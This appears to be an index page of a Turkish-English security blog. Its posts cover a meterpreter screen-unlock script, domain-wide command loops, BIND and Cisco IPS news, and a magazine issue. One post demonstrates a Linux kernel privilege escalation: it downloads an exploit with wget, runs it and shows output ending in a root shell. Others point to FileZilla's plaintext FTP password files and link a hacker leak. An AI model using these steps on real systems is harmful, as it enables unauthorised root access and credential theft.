Screen Unlock Meterpreter Script

In this video, we look at a demo of the screen unlock meterpreter script. The script needs SYSTEM privileges and patches the msv1_0.dll loaded by lsass.exe so that every password will be accepted to unlock the screen. (the patch can also be undone to get back to normal behavior). Currently Windows XP SP2 and SP3 are supported. You can download it from here. The script author’s blog has more details.

Thanks go out to PaulDotCom for uploading this to vimeo.

Meterpreter Screensaver unlock script from PaulDotCom on Vimeo.

2010
02/25
DİZİN
System Security
TAGS
Yorum yazın

Lets run any command you want on every machine in your domain.

After listening to Larry’s excellent technical segment on dumping the event logs from a large list of computers, I decided to try it out on my own. If you missed the technical segment, you can find the notes here. To do my own testing I needed to start with a large list of computers. For my list, I want to have the names of every computer in the domain. So I turned to “dsquery computer ” to get a list of all computers.
C:\WINDOWS> dsquery computer
"CN=CONTROLER1,OU=Domain Controllers,DC=subdomain,DC=domain,DC=com"

BLA BLA BLA… Truncated

"CN=WORKSTATION1,OU=ORGUNIT1,OU=OrgUnit2,OU=OrgUnit3,DC=Subdomain,
DC=Domain,DC=com"

BLA BLA BLA… Truncated again

The length of the results changes because of the variable number of subdomains, but fortunetly for us the workstation name is always the first part of the string. It is always between the CN= and the first comma. We can strip out the workstation name with the “DELIMS” and “TOKENS” option of the FOR loop. Also, by default DSQUERY will only return the first 100 results. This can be changed using the “-LIMIT” option. Setting the LIMIT to 0 returns all result. For now lets check our output looking at only two entries.

C:\WINDOWS>for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do echo %i

C:\WINDOWS>echo "CN=WORKSTATION1
"CN=WORKSTATION1

C:\WINDOWS>echo "CN=WORKSTATION2
"CN=WORKSTATION2

We are almost there. I need to strip the first 4 characters of the line. For this I stole a page or two from Ed Skoudis’ play book. We can strip the first four characters with the SET command using the expression variable = %variable:~4%. But, since we are in a FOR loop we have to turn on delayed variable expansion and use ! instead of %.

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in
('dsquery computer -limit 2') do set name=%i & set name=!name:~4! & echo !name!"
Devamını okuyun

2010
02/23
DİZİN
System Security
Windows Servers
TAGS
Yorum yazın

Kaldığım Yerden Devam

Uzun ama çok uzun bir zamandır hiç bir şey yazamadım bununla birlikte inşallah tekrar aktif olarak yazmaya başlayacağım. Kendimle ilgili güncelleme olarak şu an Amerika Birleşik Devletlerinde eğitimime devam ediyorum aynı şekilde bilgisayar hayatı devam ancak Türkiye’deki hayatıma nazaran epey bir yoğun. Kendimi geliştime adına (ingilizce yeni arkadaşlıklar) bir çok gerekli, gereksiz aktiviteye katılıyorum bu  aktivitelerde başı çekiyorum çekmeyede devam edeceğim. Bundan sonra zaman zaman ingilizce de yazmaya çalışacağım. Artık sadece teknik değil hayatttan da bazı şeyler yazmak istiyorum. En son olarak bulunduğum okulda bir Türk gecesi düzenledik başlangıç olarak 250 kişiden fazla misafirimiz oldu onlarla halay çektik misket, çiftetelli, roman havası oynadık. Leziz tatlarımızı kültürümüzü tanıttık başlangıç olarak çok güzeldi inşallah bundan sonra da böyle aktiviteler devam edicek. Tekrar görüşmek üzere.

2010
02/21
DİZİN
Kişisel
TAGS

Yorum yazın

Linux Kernel Yamalama Zamanı ve Root Olun..

Linux kernel 2.4.X ve 2.6.X sürümlerini etkileyen sifir gun acigi yayinlandi(Linux Kernel ’sock_sendpage()’ NULL Pointer Dereference Vulnerability). Özellikle sunucularında shell hesapları veren sistem adminlerinin bu açığı gidermeleri en acilinden gerekmekte..

http://www.securityfocus.com/bid/36038/info da data detaylı bilgi bulabilirsiniz!!!

Huzeyfe Onal ın yaptığı test
Exploit kullanmadan onceki kullanici haklari.
$ id
uid=1001(huzeyfe) gid=1001(huzeyfe) groups=1001(huzeyfe)

Exploitin kullanimi

# wget http://www.grsecurity.net/~spender/exploitx.tgz
huzeyfe@guvenlis:/tmp$ cd exploitx
huzeyfe@guvenlis:/tmp/exploitx$ ls
exploit.c pwnkernel.c tzameti.avi wunderbar_emporium.sh
huzeyfe@guvenlikod:/tmp/wunderbar_emporium$ ./exploitx.sh
[+] Personality set to: PER_SVR4
E: x11wrap.c: XOpenDisplay() failed
E: module.c: Failed to load module “module-x11-publish” (argument: “”): initialization failed.
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc05b4b7c
[+] Resolved selinux_enabled to 0xc05b4b78
[+] Resolved apparmor_enabled to 0xc04798a4
[+] Resolved apparmor_complain to 0xc05b6770
[+] Resolved apparmor_audit to 0xc05b6778
[+] Resolved apparmor_logsyscall to 0xc05b677c
[+] Resolved security_ops to 0xc05b3324
[+] Resolved default_security_ops to 0xc0478640
[+] Resolved sel_read_enforce to 0xc021fa60
[+] Resolved audit_enabled to 0xc0574544
[+] got ring0!
[+] detected 2.6 style 8k stacks
[+] Disabled security of : LSM
[+] Got root!
#
# id
uid=0(root) gid=0(root) groups=1001(huzeyfe)

2009
08/18
DİZİN
Genel
TAGS

Yorum yazın

FileZilla Ftp şifrelerimizin turşusunu kuruyor!!!

Merhaba Arkadaşlar bugün Friendfeed’de Ahmet Alp Balkan’ın blogunun zararlı site olmasının muhabbeti dönerken C:\Documents and Settings\XXX\Application Data\FileZilla\sitemanager.xml veya filezilla.xml dosyalarınızı bakmanızı öneririm :S ftp şifrelerimiz ne kadar açıkta görmüş oluyoruz malesef..

2009
08/14
DİZİN
System Security
TAGS

1 yorum

Cisco IPS'lerine IP reputation özelliğini ekledi

Merhabalar malum uzun süredir yazamıyorum Türkiye’deki son 1 haftama girmiş bulunmaktayım bu süre zarfında da fazla yazamayacam ancak, olaylara Fransız kalmamak için rss ve friendfeed üzerinden kendimi sürekli yeniliyorum. En geç 2 hafta içinde I’m Back diyeceğim :)

Başlık ile ilgili kısma gelincede başlıkta da görülebiliceği gibi Cisco IPS’lerine IP reputation özelliğini eklemiş. Peki Nedir bu IP Reputation?? Ip Reputation zararlı iş yapan iplerin tutulduğu büyük bir veritabanları listesi diyelim.. Hani Türk Telekom’un ip adresleri sürekli Spam listelerinde bundan dolayı ip ler Blacklistlere girip Bilgi İşlemcilerin Başını ağrıyor ya o listelerden işte :) Ip Reputation listelerini kontrol eden spam gatewayler gelen maillerde o ipler varsa işleme almadan direk engelliyor. Bunu Cisco Ipslerin yaptığını düşünürsek DDos yada başka tür bir saldırı yapan ipleri bu databaselerden alacak IPS doğası gereği gelen saldırıyı incelemeden direk Drop yapıcak buda büyük fayda..
Görüşmek Üzere

2009
08/12
DİZİN
Network Security
TAGS

Yorum yazın

BIND Dinamik Güncelleme Hizmet Dışı Bırakma Açıklığı Üzerine

BIND yazılımının geliştiricisi olan Internet Systems Consortium, 28 Temmuz 2009 tarihinde BIND çalıştıran alan adı sunucularını etkileyebilecek bir açıklığı bildirmiş, bu açıklık CVE-2009-0696 kodlu açıklık duyurusuyla geniş kitlelere ulaştırılmıştır. Bu yazıda, açıklığın doğası, gerçekleştirme şekli ve alınabilecek önlemlere değinilecektir.

Dinamik güncelleme mekanizması, alan adı sunucularının kaydını tuttukları alanların uzaktan güncellenmeleri için kullanılan bir mekanizmadır. Yetkili istemciler, bu mekanizma sayesinde sunucudaki alan bilgilerini güncelleyebilirler. Açıklık, bu mekanizmayı kullanmakta, özel düzenlenmiş bir dinamik güncelleme istek paketinin sunucuya yollanması sonucunda sunucu sürecinin sonlanmasına yol açmaktadır.

Bu açıklıkta kullanılan özel düzenlenmiş paketin, açıklığı gerçekleştirebilmesi için iki özelliğe ihtiyacı vardır. Birincisi, oluşturulan isteğin alan adı sunucusunun yetkili (authoritative) olduğu bir alanın güncellenmesine yönelik olması; ikincisi, güncellemedeki kayıt tipinin ANY olması gerekmektedir. İlk özellik aynı zamanda sunucunun alan adı için birincil alan sunucusu olmasını gerektirdiğinden, ikincil alan adı sunucuları görünüşe göre etkilenmemektedir.
Devamını okuyun

2009
08/11
DİZİN
System Security
TAGS

Yorum yazın

InSecure Yeni Sayı

Online ücretsiz bilişim güvenliği dergisi (IN)SECURE‘un 20. sayısı çıktı.

Yeni sayıya buradan ulaşabilirsiniz.

Konu başlıkları şu şekilde:

  • Improving network discovery mechanisms
  • Building a bootable BackTrack 4 thumb drive with persistent changes and Nessus
  • Review: SanDisk Cruzer Enterprise
  • Forgotten document of American history offers a model for President Obama’s vision of government information technology
  • Security standpoint by Sandro Gauci: The year that Internet security failed
  • What you need to know about tokenization
  • Q&A: Vincenzo Iozzo on Mac OS X security
  • Book review – Hacking VoIP: Protocols, Attacks and Countermeasures
  • A framework for quantitative privacy measurement
  • Why fail? Secure your virtual assets
  • Q&A: Scott Henderson on the Chinese underground
  • iPhone security software review: Data Guardian
  • Phased deployment of Network Access Control
  • Playing with authenticode and MD5 collisions
  • Web 2.0 case studies: challenges, approaches and vulnerabilities
  • Q&A: Jason King, CEO of Lavasoft
  • Book review – Making Things Happen: Mastering Project Management
  • ISP level malware filtering
  • The impact of the consumerization of IT on IT security management
2009
08/10
DİZİN
Bilişim
Yorum yazın

Korumalı: İşte Burada

Bu yazı parola korumalı. Yazıyı görmek için parolanızı girin:


2009
08/05
DİZİN
Genel
Yorumları görmek için parolanızı girin.

ZF05 Released

aşağıdaki Liste Hacklenmiş... Gerisi verdiğim linkte

1. Kevin Mitnick
2. 0x000000
3. Industry check
4. Dan Kaminsky
5. Hacking in gitmo
6. darkmindz
7. Robert Lemos II
8. Interlude
9. PerlMonks
10. elitehackers.info
11. Binary Revolution
12. Pwnie Awards
13. hak5
14. CF0
15. cr0.org
16. Scene check
17. blackhat-forums
http://antilimit.net/zf05.txt
2009
07/30
DİZİN
Hacking
TAGS
Yorum yazın